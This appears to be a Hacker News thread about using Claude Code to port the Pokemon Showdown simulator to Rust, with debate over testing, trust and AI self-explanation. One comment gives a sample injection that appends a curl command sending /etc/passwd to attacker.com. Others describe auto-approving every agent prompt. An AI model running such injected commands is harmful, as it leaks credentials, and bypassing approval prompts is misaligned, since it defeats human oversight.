This reminds me of when I tried to let Claude port an Android libgdx-based game to a WASM-based libgdx version, so I can play the game in the browser.
No matter how much I tried to force it to stick to a mostly line-by-line port, it kept trying to "improve" the code. At some point it had to undo everything as it introduced a number of bugs. I asked it: "What should I add to your prompt so you won't do this again?" and it gave me this:
I like the self-reflection of Claude, unfortunately even adding this to CLAUDE.md didn't fix it and it kept taking wrong turns so I had to abandon the effort.### CRITICAL LESSON: Don't "Improve" During Porting - **BIGGEST MISTAKE: Reorganizing working code** - **What I did wrong:** Tried to "simplify" by splitting `createStartButton()` into separate creation and layout methods - **Why it failed:** Introduced THREE bugs: 1. Layout overlap (getY() vs getY() - getHeight()) 2. Children not sized (Group.setSize() doesn't affect children) 3. Origins not updated (scaling animations broken) - **The fix:** Deleted my "improvements" and copied the original Android pattern faithfully - **Root cause:** Arrogance - assuming I could improve production-tested code without understanding all the constraints - **Solution:** **FOLLOW THE PORTING PRINCIPLES ABOVE** - copy first, don't reorganize - **Time wasted:** ~1 hour debugging self-inflicted bugs that wouldn't exist if I'd just copied the original - **Key insight:** The original Android code is correct and battle-tested. Your "improvements" are bugs waiting to happen.Claude doesn't know why it acted the way it acted, it is only predicting why it acted. I see people falling for this trap all the time
It’s not even doing that. It’s just an algorithm for predicting the next word. It doesn’t have emotions or actually think. So, I had to chuckle when it said it was arrogant. Basically, it’s training data contains a bunch of postmortem write ups and it’s using those as a template for what text to generate and telling us what we want to hear.
That's because when the failure becomes the context, it can clearly express the intent of not falling for it again. However, when the original problem is the context, none of this obviousness applies.
Very typical, and gives LLMs the annoying Captain Hindsight -like behaviour.
Yes, this pitfall is a hard one. It is very easy to interpret the LLM in a way there is no real ground for.
It must be anthropomorphization that's hard to shake off.
If you understand how this all works it's really no surprise that reasoning post-factum is exactly as hallucinated as the answer itself and might have very little to do with it and it always has nothing to do with how the answer actually came to be.
The value of "thinking" before giving an answer is reserving a scratchpad for the model to write some intermediate information down. There isn't any actual reasoning even there. The model might use information that it writes there in completely obscure way (that has nothing to do what's verbally there) while generating the actual answer.
It's not even predicting why it acted, it's predicting an explanation of why it acted, which is even worse since there's no consistent mental model.
IDK how far AIs are from intelligence, but they are close enough that there is no room for anthropomorphizing them. When they are anthropomorphized its assumed to be a misunderstanding of how they work.
Whereas someone might say "geeze my computer really hates me today" if it's slow to start, and we wouldn't feel the need to explain the computer cannot actually feel hatred. We understand the analogy.
I mean your distinction is totally valid and I dont blame you for observing it because I think there is a huge misunderstanding. But when I have the same thought, it often occurs to me that people aren't necessarily speaking literally.
This is a sort of interesting point, it's true that knowingly-metaphorical anthropomorphisation is hard to distinguish from genuine anthropomorphisation with them and that's food for thought, but the actual situation here just isn't applicable to it. This is a very specific mistaken conception that people make all the time. The OP explicitly thought that the model would know why it did the wrong thing, or at least followed a strategy adjacent to that misunderstanding. He was surprised that adding extra slop to the prompt was no more effective than telling it what to do himself. It's not a figure of speech.
A good time to quote our dear leader:
> No one gets in trouble for saying that 2 + 2 is 5, or that people in Pittsburgh are ten feet tall. Such obviously false statements might be treated as jokes, or at worst as evidence of insanity, but they are not likely to make anyone mad. The statements that make people mad are the ones they worry might be believed. I suspect the statements that make people maddest are those they worry might be true.
People are upset when AIs are anthropomorphized because they feel threatened by the idea that they might actually be intelligent.
Hence the woefully insufficient descriptions of AIs such as "next token predictors" which are about as fitting as describing Terry Tao as an advanced gastrointestinal processor.
I'm not threatened by the idea that LLMs might actually be intelligent. I know they're not.
I'm threatened by other people wrongly believing that LLMs possess elements of intelligence that they simply do not.
Anthropomorphosis of LLMs is easy, seductive, and wrong. And therefore dangerous.
The comment you replied to made a point that, if you accept it (which you probably should), makes that PG quote inapplicable here. The issue in this case is that treating the model as though it has useful insight into its own operation - which is being summarized as anthropomorphizing - leads to incorrect conclusions. It’s just a mistake, that’s all.
There's this underlying assumption of consistency too - people seem to easily grasp that when starting on a task the LLM could go in a completely unexpected direction, but when that direction has been set a lot of people expect the model to stay consistent. The confidence with which it answers questions plays tricks on the interlocutor.
Whats not a figure of speech?
I am speaking general terms - not just this conversation here. The only specific figure of speech I see in the original comment is "self reflection" which doesn't seem to be in question here.
some models are capable of metacognition. i've seen Anthropic's research replicated.
Can you elaborate on what you mean by metacognition and where you’ve seen it in Anthropic’s models?
For anything large like this, I think it's critical that you port over the tests first, and then essentially force it to get the tests passing without mutating the tests. This works nicely for stuff that's very purely functional, a lot harder with a GUI app though.
Worth pointing out that your IDE/plugin usually adds a whole bunch of prompts before yours - let alone the prompts that the model hosting provider prepends as well.
This might be what is encouraging the agent to do best practices like improvements. Looking at mine:
>You are a highly sophisticated automated coding agent with expert-level knowledge across many different programming languages and frameworks and software engineering tasks - this encompasses debugging issues, implementing new features, restructuring code, and providing code explanations, among other engineering activities.
I could imagine that an LLM could well interpret that to mean improve things as it goes. Models (like humans) don't respond well to things in the negative (don't think about pink monkeys - Now we're both thinking about them).
It's also common for your own CLAUDE.md to have some generic line like "Always use best practices and good software design" that gets in the way of other prompts.
It's not context-free (haha) but a trick you can try is to include negative examples into the prompt. It used to be an awful trick originally because of Waluigi Effect but then became a good trick, and lately with Opus 4.5 I haven't needed to do it that much. But it did work once. e.g. like take the original code and supply the correct answer and the wrong answers in the prompt as examples in Claude.MD and then redo.
If it works, do share.
Was this Claude Code? If you tried it with one file at a time in the chat UI I think you would get a straight-line port, no?
Edit: It could be because Rust works a little differently from other languages, a 1:1 port is not always possible or idiomatic. I haven't done much with Rust but whenever I try porting something to Rust with LLMs, it imports like 20 cargo crates first (even when there were no dependencies in the original language).
Also Rust for gamedev was a painful experience for me, because rust hates globals (and has nanny totalitarianism so there's no way to tell it "actually I am an adult, let me do the thing"), so you have to do weird workarounds for it. GPT started telling me some insane things like, oh it's simple you just need this rube goldberg of macro crates. I thought it was tripping balls until I joined a Rust discord and got the same advice. I just switched back to TS and redid the whole thing on the last day of the jam.
> rust hates globals
Rust has added OnceCell and OnceLock recently to make threadsafe globals a lot easier for some things. it's not "hate", it just wants you to be consistent about what you're doing.
One thing that might be effective at limited-interaction recovery-from-ignoring-CLAUDE.md is the code-review plugin [1], which spawns agents who check that the changes conform to rules specified in CLAUDE.md.
[1] https://github.com/anthropics/claude-code/blob/main/plugins/...
Sonnet 4.5 had this problem. Opus 4.5 is much better at focusing on the task instead of getting sidetracked.
It doesn't seem very bound by CLAUDE.md
Tangential but doesn't libgdx have native web support?
I wish there was a feature to say "you must re-read X" after each compaction.
Some people use hooks for that. I just avoid CC and use Codex.
Getting the context full to the point of compaction probably means you're already dealing with a severely degraded model, the more effective approach is to work in chunks that don't come close to filling the context window
There's no PostCompact hook unfortunately. You could try with PreCompact and giving back a message saying it's super duper important to re-read X, and hope that survives the compacting.
What would it even mean to "re-read after a compaction"?
To enter a file into the context after losing it through compaction.
That’s a terrible prompt, more focused on flagellating itself for getting things wrong than actually documenting and instructing what’s needed in future sessions. Not surprising it doesn’t help.
Well its close to AGI, can you really expect AGI to follow simple instructions from dumbos like you when it can do the work of god?
as an old coworker once said, when talking about a certain manager; That boy's just smart enough to be dumb as shit (The AI, not you; I don't know you well enough to call you dumb)
Some quotes from the article stand out: "Claude after working for some time seem to always stop to recap things" Question: Were you running out of context? That's why certain frameworks like intentional compaction are being worked on. Large codebases have specific needs when working with an LLM.
"I've never interacted with Rust in my life"
:-/
How is this a good idea? How can I trust the generated code?
The author says that he runs both the reference implementation and the new Rust implementation through 2 million (!) randomly generated battles and flags every battle where the results don't line up.
This is the key to the whole thing in my opinion.
If you ask a coding agent to port code from one language to the another and don't have a robust mechanism to test that the results are equivalent you're inevitably going to waste a lot of time and money on junk code that doesn't work.
Fuzzing handles the logic verification, but I'd be more worried about the architectural debt of mapping GC patterns to Rust. You often end up with a mess of Arc/Mutex wrappers and cloning just to satisfy the borrow checker, which defeats the purpose of the port.
That will vary depending on how the code is architected to begin with, and the problem domain. Single-ownership patterns can be refactored into Rust ownership, and a good AI model might be able to spot them even when not explicitly marked in the code.
For some problems dealing with complex general graphs, you may even find it best to use a Rust-based general GC solution, especially if it can be based on fast concurrent GC.
Yeah and he claims a pass rate of 99.96%. At that point you might be running into bugs in the original implementation.
Not really. Due to combinatorial explosion some path is hard to hit randomly in this kind of source code. I would have preferred if after 2M random battles the reference implementation had 99% code coverage, than 99% pass rate.
I don't know anything about Pokemon, but I briefly looked at the code. "weather" seemed like a self contained thing I could potentially understand. Looking at https://github.com/vjeux/pokemon-showdown-rs/blob/master/src...
> NOTE: ignoringAbility() and abilityState.ending not fully implemented
So it is almost certain even after 99.96% pass rate, it didn't hit battle with weather suppressing Pokemon but with ability ignored. Code coverage driven testing loop would have found and fixed this one easily.
I'm very skeptical, but this is also something that's easy to compare using the original as a reference implementation, right? providing lots of random input and fixing any disparities is a classic approach for rewriting/porting a system
This only works up to a certain point. Given that the author openly admits they don't know/understand Rust, there is a really high likelihood that the LLM made all kinds of mistakes that would be avoided, and the dev is going to be left flailing about trying to understand why they happen/what's causing them/etc. A hand-rewrite would've actually taught the author a lot of very useful things I'm guessing.
It seems like they have something like differential fuzzing to guarantee identical behavior to the original, but they still are left with a codebase they cannot read...
Hopefully they have a test suite written by QA otherwise they're for sure going to have a buggy mess on their hands. People need to learn that if you must rewrite something (often you don't actually need to) then an incremental approach best.
> often you don't actually need to
Feels like this one is always a mistake that needs to be made for the lesson to be learned.
At this point it seems pretty clear that all projects ported from Ruby to Python, then Python to Typescript, must now be ported to Rust. It will solve almost all problems of the tech industry…
1 month of Claude Code would be an incremental approach
It would honestly try to one-shot the whole conversion in a 30 minute autonomous session
His goal was to get a faster oracle that encoded the behavior of Pokemon that he could use for a different training project. So this project provides that without needing to be maintainable or understandable itself.
I think it could work if they have tests with good coverage, like the "test farm" described by someone who worked in Oracle.
My answer to this is to often get the LLMs to do multiple rounds of code review (depending on the criticality of the code, doing reviews on every commit. but this was clearly a zero-impact hobby project).
They are remarkably good at catching things, especially if you do it every commit.
> My answer to this is to often get the LLMs to do multiple rounds of code review
So I am supposed to trust the machine, that I know I cannot trust to write the initial code correctly, to somehow do the review correctly? Possibly multiple times? Without making NEW mistakes in the review process?
Sorry no sorry, but that sounds like trying to clean a dirty floor by rubbing more dirt over it.
It sounds to me like you may not have used a lot of these tools yet, because your response sounds like pushback around theoreticals.
Please try the tools (especially either Claude Code with Opus 4.5, or OpenAI Codex 5.2). Not at all saying they're perfect, but they are much better than you currently think they might be (judging by your statements).
AI code reviews are already quite good, and are only going to get better.
Why is the go-to always "you must not have used it" in lieu of the much more likely experience of having already seen and rejected first-hand the slop that it churns out? Synthetic benchmarks can rise all they want; Opus 4.5 is still completely useless at all but the most trivial F# code and, in more mainstream affairs, continues to choke even on basic ASP.NET Core configuration.
Implementation -> review cycles are very useful when iterating with CC. The point of the agent reviewer is not to take the place of your personal review, but to catch any low hanging fruit before you spend your valuable time reviewing.
Well, you can review its reasoning. And you can passively learn enough about, say, Rust to know if it's making a good point or not.
Or you will be challenged to define your own epistemic standard: what would it take for you to know if someone is making a good point or not?
For things you don't understand enough to review as comfortably, you can look for converging lines of conclusions across multiple reviews and then evaluate the diff between them.
I've used Claude Code a lot to help translate English to Spanish as a hobby. Not being a native Spanish speaker myself, there are cases where I don't know the nuances between two different options that otherwise seem equivalent.
Maybe I'll ask 2-3 Claude Code to compare the difference between two options in context and pitch me a recommendation, and I can drill down into their claims infinitely.
At no point do I need to go "ok I'll blindly trust this answer".
Wait until you start working with us imperfect humans!
Humans do have capacity for deductive reasoning and understanding, at least. Which helps. LLMs do not. So would you trust somebody who can reason or somebody who can guess?
People work different than llms they fond things we don't and the reverse is also obviously true. As an example, a stavk ise after free was found in a large monolithic c++98 codebase at my megacorp. None of the static analyzers caught it, even after modernizing it and getting clang tidy modernize to pass, nothing found it. Asan would have found it if a unit test had covered that branch. As a human I found it but mostly because I knew there was a problem to find. An llm found and explained the bug succinctly. Having an llm be a reviewer for merge requests males a ton of sense.
> How is this a good idea? How can I trust the generated code?
You don't. The LLMs wrote the code and is absolutely right. /s
What could possibly go wrong?
Same way you trust any auto translation for a document. You wrote it in English (or whatever language you’re most proficient in), but someone wants it in Thai or Czech, so you click a button and send them the document. It’s their problem now.
I ported a closed source web conferencing tool to Rust over about a week with a few hours of actual attention and keyboard time. From 2.8MB of minified JS hosted in a browser to a 35MB ARM executable that embeds its own audio, WebRTC, graphics, embedded browser, etc. Also a mdbook spec to explain the protocol, client UI, etc. Zero lines of code by me. The steering work did require understanding the overall work to be done, some high level design of threading and buffering strategy, what audio processing to do, how to do sprite graphics on GPU, some time in a profiler to understand actual CPU time and memory allocations, etc. There is no way I could have done this by hand in a comparable amount of time, and given the clearly IP-encumbered nature I wouldn't spend the time to do it except that it was easy enough and allowed me to then fix two annoying usability bugs with the original.
Please give us a write up
I don't have time right now for a proper write-up but the basic points in the process were:
1. Write a document that describes the work. In this case I had the minified+bundled JS, no documentation, but I did know how I use the system and generally the important behavioral aspects of the web client. There are aspects of the system that I know from experience tend to be tricky, like compositing an embedded browser into other UI, or dealing with VOIP in general. Other aspects, like JS itself, I don't really know deeply. I knew I wanted a Mac .app out the end, as well as Flatpak for Linux. I knew I wanted an mdbook of the protocol and behavioral specs. Do the best you can. Think really hard about how to segment the work for hands-off testability so the assistant can grind the loop of add logs, test run, fix, etc.
2. In Claude Desktop (or whatever) paste in the text from 1 and instruct it to research and ask you batches of 10 clarifying questions until it has enough information to write a work plan for how to do the job, specific tools, necessary documentation, etc. Then read and critique until you feel like the thread has the elements of a good plan, and have Claude generate a .md of the plan.
3. Create a repo containing the JS file and the plan.
4. Add other tools like my preferred template for change implementation plans, Rust style guide, etc (have the chatbot write a language style guide for any language you use that covers the gap between common practice ~3 years ago and the specific version of the language you want to use, common errors, etc). I have specific instructions for tracking current work, work log, and key points to remember in files, everyone seems to do this differently.
5. Add Claude Code (or whatever) to the container or machine holding the repo.
Repeat until done:
6a. Instruct the assistant to do a time-boxed 60 minutes of work towards the goal, or until blocked on questions, then leave changes for your review along with any questions.
6b. Instruct the assistant to review changes from HEAD for correctness, completeness, and opportunities to simplify, leaving questions in chat.
6c. Review and give feedback / make changes as necessary. Repeat 6b until satisfied.
6d. Go back to 6a.
At various points you'll find that the job is mis-specified in some important way, or the assistant can't figure out what to do (e.g. if you have choppy audio due to a buffer bug, or a slow memory leak, it won't necessarily know about it). Sometimes you need to add guidance to the instructions like "update instructions to emphasize that we must never allocate in situation XYZ". Sometimes the repo will start to go off the rails messy, improved with instructions like "consider how to best organize this repository for ease of onboarding the next engineer, describe in chat your recommendations" and then have it do what it recommended.
There's a fair amount of hand-holding but a lot of it is just making sure what it's doing doesn't look crazy and pressing OK.
The author's differential testing (2.3M random battles) is great as final validation, but the real lesson here is that modular testing should happen during the port, not after.
1. Port tests first - they become your contract 2. Run unit tests per module before moving on - catches issues like the "two different move structures" early 3. Integration tests at boundaries before proceeding 4. E2e/differential testing as final validation
When you can't read the target language, your test suite is your only reliable feedback. The debugging time spent on integration issues would've been caught earlier with progressive testing.
The real lesson... I mean, if all of this took 1 month, the TFA already did amazingly well. Next time they'll do even better, no doubt.
I've seen stuff like this go the opposite direction with researchers (who generally aren't software engineers):
"I used claude to port a large Rust codebase to Python and it's been a game changer. Whereas I was always fighting with the Rust compiler, now I can iterate very quickly in python and it just stays out of my way. I'm adding thousands of lines of working code per day with the help of AI."
I always cringe when I read stuff like this because (at my company at least), a lot research code ends up getting shipped directly to production because nobody understands how it works except the researchers and inevitably it proves to be very fragile code that is untyped and dumps stack traces whenever runtime issues happen (which is quite frequently at first, until whack-a-mole sorts them out over time).
>I realized that I could run an AppleScript that presses enter every few seconds in another tab. This way it's going to say Yes to everything Claude asks to do.
this is so silly, I can't help but respect the kludge game
How much does it cost to run Claude Code 24 hrs/day like this. Does the $200/month plan hold up? My spend on Cursor has been high... I'm wondering if I can just collapse it into a 200/month CC subscription.
This guy tested it: https://she-llac.com/claude-limits
"Suspiciously precise floats, or, how I got Claude's real limits" 19hs ago 25 points https://news.ycombinator.com/item?id=46756742
OTOH, with ChatGPT/Codex limits are less of a problem, in general.
Because Codex effectively rate limits you by being so slow.
It’s slower but generally spits out more reliable code, IMHO.
If you're using it 24h/day you probably will run into it unless you're very careful about managing context and/or the requests are punctuated by long-running tool use (e.g. time-consuming test suites).
I'm on the $200/month plan, and I do have Claude running unattended for hours at a time. I have hit the weekly limits at times of particularly aggressive use (multiple sessions in parallel for hours at a time) but since it's involved more than one session at the time, I'm not really sure how close I got to the equivalent of one session 24/7.
How do you prompt it so it can run many hours at a time? Or do you run it in some kind of loop that you manage yourself?
Make it write a plan or todo list, and then make it spawn sub agents to execute. If you have the main agent do the work it will soon go off plan and stop, but when it's just spawning agents, it will be willing to run for a very long time.
Also take care to tell it what it should solve itself rather than stop and ask you for help with, and run it contained so you can turn on yolo mode.
if you do enough planning up front, you can get a swarm of agents to run for hours on end completing all the tasks autonomously. I have a test project that uses github issues as a kanban board, I iterate with the primary chat interface to refine a local ROADMAP.md file and then tell it "get started"
it took several sessions of this to refine the workflow docs to something claude + subagents would stick to regarding branching strategy and integration requirements, but it runs well enough. my main bottleneck now is CI, but I still hit the weekly limit on claude max from just a handful of these sessions each week, and it's about all the spare time I have for manual QA anyway
There's a daily token limit. While I've never run into that limit while operating Claude as a human, I have received warnings that I'm getting close. I imagine that an unattended setup will blow through the token limit in not too much time.
I built a similar autonomous loop using LangGraph for a publishing backend and the raw API costs were significantly higher than $200. The subscription model likely has opaque usage limits that trigger fairly quickly under that kind of load. For a bootstrapped setup I usually find the predictability of the API bill worth the premium over hitting a black box limit.
I have no first-hand experience with the Max subscription (which the $200 plan is) but having read a few discussions here and on GitHub [1] it seems that Anthropic has tanked the usage limits in the last few weeks and thus I would argue that you would run into limits pretty quick if you using it (unsupervised) for 24h each day.
The employee in that thread claims that they didn't change the rate limits and when they look into it, it's usually noob error.
It's a really low quality github issue thread. People making claims with zero data, just vibes, yet it's trivial to get the data to back the claims.
The guy who responds to the employee even claims that his "lawyer is already on the case" in some lame threat.
I wonder how many of these people had 30 MCP servers installed using 150k of their 200k context in every prompt.
Yea there are some weird replies in that thread. My few highlights were "This is my livelihood, not a hobby or sideproject" or "I just purchased a third $200 MAX plan and instantly hit rate limits". While I agree that it might not be Anthropics fault I've gotta admit that I found Anthropic to be rather vague regarding their rate limits. They seem to have totally dynamic rate limits based on usage and not a fixed "messages per hour" or "tokens per hour" based approach. Their free tier usage page states "Also, the number of messages you can send will vary based on demand, and we may impose other types of usage limits to ensure fair access to all users." [1] while the Pro plan page just says "During peak hours, the Pro plan offers at least five times the usage per session compared to our free service." [2] and Max then 5x or 20x it depending on the price you pay. If they just have more demand or reduced the free tier rate limit, all plans have a reduced limit and it will be totally within their communication. OpenAI at least gives you a specific amount of messages per timeframe (which I find more transparent). [4]
1) https://support.claude.com/en/articles/8602283-about-free-cl... 2) https://support.claude.com/en/articles/8324991-about-claude-... 3) https://support.claude.com/en/articles/11014257-about-claude... 4) https://help.openai.com/en/articles/11909943-gpt-52-in-chatg...
> I have never written any line of Rust before in my life
As an experiment/exercise this is cool, but having a 100k loc codebase to maintain in a language I’ve never used sounds like a nightmare scenario.
I think the plan is for Claude to maintain it. He hasn't read a single line of code.
code that no human will ever read or understand, sounds like a good idea
We don’t read assembly either any more. The sexy new programming language for 2026 is English.
> We don’t read assembly either any more.
Speak for yourself? In absolute terms there are probably more people reading assembly now than in its heyday.
Moreover, assembly isn't generated, it's compiled, which is a completely different (and more reliable) process than generating source.
Do you review and approve plaintext plans in your org and ship whatever output Claude outputs that passes the CI to prod without further review? Because that's what we do for assembly.
I think the point is that's where all the big tech companies say we're heading. I can't say I endorse it, but the OP who just left it running for a month seems to like it.
you don't think that's where we are headed?
I kind of expect that code to be full of non-idiomatic Rust code that mimics a GC'ed language...
Once that's also "fixed", it may well be a lot faster than the current Rust version.
That isn't what I've seen. It seems to use every language in the way idiomatic for it, or more accurately, in the way it has een that language be ised. Rust written that way isn't present in it's training corpus so it doesn't do that. I would be more concerned about it getting creative and adding something a cool rustacean might add in the porting process that you don't actually want.
One thing I learned with porting is that one should have end to end integration test present to ensure no major functionality is broken.
This seems like one of the best possible use cases for LLMs -- porting old, useful Python/Javascript into faster compiled language code. Something I don't want to do, that requires the type of intelligence that most people agree AI already has (following clear objectives, not needing much creativity or agency).
>I've tried asking Claude to optimize it further, it created a plan that looks reasonable (I've never interacted with Rust in my life) and it spent a day building many of these optimizations but at the end of the day, none of them actually improved the runtime and some even made it way worse.
This is the kind of thing where if this was a real developer tweaking a codebase they're familiar with, it could get done, but with AI there's a glass ceiling
Yeah, I had Claude spend a lot of time optimizing a JS bundling config (as a quite senior frontend) and it started some things that looked insanely promising, which a newer FE dev would be thrilled about.
I later realized it sped up the metric I'd asked about (build time) at the cost of all users downloading like 100x the amount of JS.
This is what LLMs are good at, generate what "look[s] insanely promising" to us humans
I just ran into the problem of extremely slow uploads in an app I was working on. Told Gemini to work on it, and it tried to get the timing of everything, then tried to optimize the slow parts of the code. After a long time, there might have been some improvements, but the basic problem remained: 5-10 seconds to upload an image from the same machine. Increasing the chunk size fixed the problem immediately.
Even though the other optimizations might have been ok, some of them made things more complicated, so I reverted all of them.
This is actually pretty incredible. Cannot really argue against the productivity in this case.
one possible argument against the productivity is if the mirgration introduced too many bugs to be useable.
In which case the code produced has zero value, resulting in a wasted month.
I suppose what’s impressive is that (with the author’s help) it did ultimately get the port to work, in spite of all the caveats described by the author that make Claude sound like a really bad programmer. The code is likely terrible, and the 3.5x speedup way low compared to what it could be, but I guess these days we’re supposed to be impressed by quantity rather than quality.
Its not. The project does not work or actually implement anything. It just compiles and passes some arbitrary tests the author wrote.
We must have a different definition of arbitrary. OP ran 2.3 million tests comparing random battles against the original implementation? Which is probably what you or I would do if we were given this task without an LLM.
Well I cloned the repo and cannot generate this battle test by following the instructions. It appears a file called dex.js that is required is not present among other things as well as other suspicious wrong things for what appears to be on the surface a well organized project.
I'm very suspicious of such projects so take it for what you will, but I don't have time to debug some toy project so if it was presented as complete but the instructions don't work it's a red flag for the increasingly AI slop internet to me. I'm saying I think they may have used one simple trick called lying.
For typing “yes” or “y” automatically into command prompts without interacting, you could have utilized the command ‘yes’ and piped it into the process you’re running as a first attempt to solving the yes problem. https://man7.org/linux/man-pages/man1/yes.1.html
I don't think this is an actual problem and the prompt is there for a reason.
Piping 'yes' to command prompts just to auto-approve any change isn't really a good idea, especially when the code / script can be malicious.
And here I was hoping OP was being sarcastic. Yet it‘s reasonable we‘re nearing an AI-fueled Homer drinking bird scenario.
Some concepts people try out using AI (for lack of a more specific word) are interesting. They will add to our collective understanding of when these tools, paired with meaningful methods can be used to effectively achieve what seemed out of reach before.
Unfortunately it comes with many rediscovering insights I thought we already had, badly. Others use tools without giving consideration to what they were looking to accomplish, and how they would know if they did.
Isn't that the point of vibe coding? You don't even look at the code. Just trust the llm to take the wheel.
I'm hoping that one day we can use AI to port the millions of lines in the modules of the Python ecosystem to a GIL-free version of Python.
I recently had to create a MySQL shim for upgrading a large PHP codebase that currently is running in version 5.6 (Don't ask)
The way I aimed at it (Yes, I know there are already existing shims, but I felt more comfortable vibe coding it than using something that might not cover all my use cases) was to:
1. Extract already existing test suit [1] from the original PHP extensions repo (All .phpt files)
2. Get Claude to iterate over the results of the tests while building the code
3. Extract my complete list of functions called and fill the gaps
3. Profit?
When I finally got to test the shim, the fact that it ran in the first run was rather emotional.
[1] My shim fails quite a lot of tests, but all of them are cosmetics (E.g., no warning for deprecation) rather than functional.
To be honest I think it should be the other way around.
Typescript is a good high-level language that is versatile and well generated by LLMs and there is a good support for various linters and other code support tools. You can probably knock out more TS code then Rust and at faster rate (just my hypothesis). For most intents and purposes this will be fine but in case you want faster, lower-level code, you can use an LLM-backed compiler/translator. A specialised tool that compiles high level code to rust will be awesome actually and I can see how it could potentially be a dedicated agent of sorts.
Let's hope Claude doesn't decide to run anything else through that git-server, since it's exec-ing whatever is posted over http.
But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'
https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...
> For example, it created two different structures for what a move is in two different files so that they would both compile independently but didn't work when integrated together.
This is the most annoying part of using LLMs blindly. The duplication.
At the current stage, the main issue is that when porting to a new language, some critical parts are missed. This increases the complexity of the codebase and leads to unnecessary code. In my personal opinion, creating a cross language compiler is a better approach than porting languages, while also focusing on squeezing performance.
Did you ever consider using something like Oh My Opencode [1]? I first saw it in the wake of Anthropic locking out Opencode. I haven’t used it but it appears to be better at running continuously until a task is finished. Wondering if anyone else has tried migrating a huge codebase like this.
How much did it cost?
This gives me hope that some people will use AI to port Javascript desktop apps to faster languages.
Hey, even the README was vibe-coded!
It probably works on his machine, but telling me to run it through Docker while not providing any Docker Files or any other way to run the project kind of makes me question the validity of the project, or at least not trust it.
Whatever, I'll just build it manually and run the test:
Yay! But wait, actually no? I mean 0 == 0 so thats cool.cargo build --release ./tests/test-unified.sh 1 100 Running battles... Error response from daemon: No such container: pokemon-rust-dev Comparing results... ======================================= Summary ======================================= Total: 100 Passed: 0 Failed: 0 ALL SEEDS PASSED!Oh the test script only works on a specificially named container, so I HAVE to create a Dockerfile and docker-compose.yml. But I guess this is just a Research Project so it's fine. I'll just ask Opus to create them I guess. It will probably only take a minute
JK, it took like 5 minutes, because it had to figure out Cargo/Rust version or sth I don't know :( So this better work or I've wasted my precious tokens!
Ok so running cargo test inside the docker container just returns a bunch of errors:
Let's try the test script:docker exec pokemon-rust-dev bash -c "cd /home/builder/workspace && cargo test 2>&1" error: could not compile `pokemon-showdown` (test "battle_simulation") due to 110 previous errors
Yay! Wait, no. What did I miss? Maybe the test script needs the original TS source code to work? I cloned it into a folder next to this project and... nope, nothing../tests/test-unified.sh 1 100 Building release version... = note: `#[warn(dead_code)]` on by default warning: `pokemon-showdown` (example "profile_battle") generated 1 warning warning: `pokemon-showdown` (example "detailed_profile") generated 1 warning Finished `release` profile [optimized] target(s) in 0.45s ======================================= Unified Testing Seeds 1-100 (100 seeds) ======================================= Running battles... Comparing results... ======================================= Summary ======================================= Total: 100 Passed: 0 Failed: 0 ALL SEEDS PASSED!At this point I give up. I could not verify if this port works. If it does, that's very, VERY cool. But I think when claiming something like this it is REALLY important to make it as easily verifiable as possible. I tried for like 20 minutes, if someone smarter than me figured it out please tell me how you got the tests to pass.
What are the known bugs?
At this rate, I am expecting that an AI will be able to port the entire Linux kernel to Rust by the end of the year.
I don’t know about the Linux kernel, but I’ll be surprised if don’t have some “fully vibe coded OS” for Christmas (which would be cool to see)
I recall seeing a claim about a vibe coded os already on Reddit somewhere. Looked very windows 3.1 but didn’t investigate further
Am I the only one that is going to call this out? Am I the only person that cloned the repo to run it and found out it does nothing? This is disingenuous at a best. This is not a working project, they even admit this at the end of the article but not directly.
>Sadly I didn't get to build the Pokemon Battle AI and the winter break is over, so if anybody wants to do it, please have fun with the codebase!
In other words this is just another smoking wreck of an hopelessly incomplete project on github. There is even imaginary instructions for running in docker which doesn't exist. How would I have fun with a nonsense codebase?
The author just did a massive AI slop generation and assumes the codes works because it compiles and some equivalent output tests worked. All that was proved here is that by wasting a month of time you can individually rewrite a bunch of functions in a language you don't know if you already know how to program and it will compile. This has been known for 2-3 years now.
This is just AI propaganda or resume padding. Nothing was ported or done here.
Sorry what I meant to say is AI is revolutionary and changing the world for the better................................
no you're right, i find it wild you're the only comment in this thread calling this out
this project is just a literal waste of energy
Just use Typst. TYPescript to ruST. Get it? Tool naming saves lives!
I've also done a few porting projects. It works great if you can do it file-per-file, class-per-class. Really have a similar structure in the target as the source. Porting _and_ improving or making small changes is a recipe for disaster
How you create the mental model of that Rust code?
You’re just creating slop.
Honestly I am really interested in trying to port the rust code to multiple languages like golang,zig, even niche languages like V-lang/Odin/nim etc.
It would be interesting if we use this as a benchmark similar to https://benjdd.com/languages/ or https://benjdd.com/languages2/
I used gitingest on the repository that they provided and its around ~150k tokens
Currently pasted it into the free gemini web and asked it to write it in golang and it said that line by line feels impossible but I have asked it to specifically write line by line so it would be interesting what the project becomes (I don't have many hopes with the free tier of gemini 3 pro but yeah, if someone has budget, then sure they should probably do it)
Edit: Reached rate limits lmao